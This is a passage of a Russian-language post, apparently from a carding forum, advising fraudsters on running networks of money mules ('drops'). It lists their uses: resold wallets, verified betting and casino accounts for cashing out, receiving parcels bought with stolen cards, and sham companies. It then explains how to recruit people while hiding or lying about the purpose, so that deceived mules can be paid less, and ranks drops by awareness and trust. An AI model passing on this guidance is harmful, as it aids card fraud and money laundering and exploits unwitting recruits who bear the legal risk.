кошелька для последующей продажи. Создание учётных записей. Здесь имеются в виду не обычные учётки на сайтах, а те, где требуется подтверждение личности – к примеру, букмекерские конторы, казино, покер-румы и подобное. В основном их потом используют для отработки финансов. Приём посылок. Наверное, самая заезженная, но при этом никогда не теряющая популярности тема. Суть заключается в том, что кардер указывает адрес дропа для доставки вбитого стаффа, таким образом не светя своё настоящее местоположение и впоследствии договариваясь о том, как поступать с вещами. Регистрация фиктивных ООО и ИП. Самая дорогостоящая при хорошем выполнении схема, при этом требующая огромных усилий и вложений для реализации. Используется во множестве областей, и на неё всегда есть спрос. Выше были приведены лишь несколько примеров того, что можно реализовать, будучи дроповодом – кроме этого существует огромное количество методов достать деньги порой будто бы прямо из воздуха. Всё упирается лишь в вашу настойчивость, готовность работать и креативность.
  15. Итак, представим, что вы решили начать вербовать свою сетку дропов. Запомните: не стоит ко всем и каждому приходить с сообщением о том, что вы набираете людей для выполнения частей теневого плана. На вопрос «почему имеется сразу несколько ответов: во-первых, огромное количество людей сразу же откажется; во-вторых, такой открытой формулировкой в случае чего вы ставите под удар сами себя – если это случайный человек из интернета, то вы никогда не узнаете, что у него на уме. И, наконец. Третья причина – некоторые операции проще проводить не вводя своего подопечного в курс дела или даже давая ему дезинформацию – так будет спокойнее и ему, и вам, а денег по итогу можно заплатить меньшее количество. В целом, виды дропов в плане информированности можно разделить на три большие категории: Разводные. Те, которые понятия не имеют, для чего их на самом деле используют – они уверены, что занимаются какой-то абсолютно легальной деятельностью, за которую им платят. Самое главное в том, чтобы завербовать такого человека и в дальнейшем им пользоваться – красиво играть свою роль, создавать некую отдельную реальность, в которой вы, к примеру, представитель небольшой фирмы-реселлера. Полуразводные. Самая спорная категория. Те персонажи, которые имеют некое представление, что вообще происходит, но которых убедили что на самом деле они занимаются намного более «мягкими» делами. То есть, к примеру, что кошелёк, который они открыли, используется не для быстрого обнала «чёрных» денег, а для чистых переводов между странами с меньшим процентом. Неразводные. Далеко не самая лёгкая цель, потому что это люди, которые прекрасно понимают, чем они занимаются, чем рискуют и какой профит могут с этого получить. Относится к ним стоит скорее не как к «пешкам», которыми вы пользуетесь, а как к компаньону – если вы будете качественно сотрудничать, то выгода будет как ему, так и вам. Кроме этого, существует ещё и деление по уровню «доверия» и готовности сотрудничать. Здесь существует два типа: «ручные» дропы и «не ручные». Первым вы доверяете, поскольку уже был опыт успешной работы вместе, и знаете, что в случае чего они не пойдут в банк закрывать только что открытые на своё имя счета и звонить в органы. Кроме того, с такими персонажами всегда можно найти общий язык касательно дополнительных услуг: к примеру, если клиенту понадобилась дополнительная верификация по PhotoID, и он готов заплатить. Ручному работнику вы предлагаете этот вариант, и он согласится, поскольку понимает, что это выгодно как ему, так и вам. С не ручными же ситуация строго обратная – они готовы выполнить некие базовые требующиеся от них действия, но этим и ограничатся. Таким образом, самый приятный и надёжный вариант, который вы можете заиметь – это ручной неразводной дроп. Он надёжен, понимает, что делает и знает цену работы с вами. В финансовом плане же самое выгодной – ручной разводной, потому что он готов буквально за копейки делать то, что необходимо вам.
×
×
  • Создать...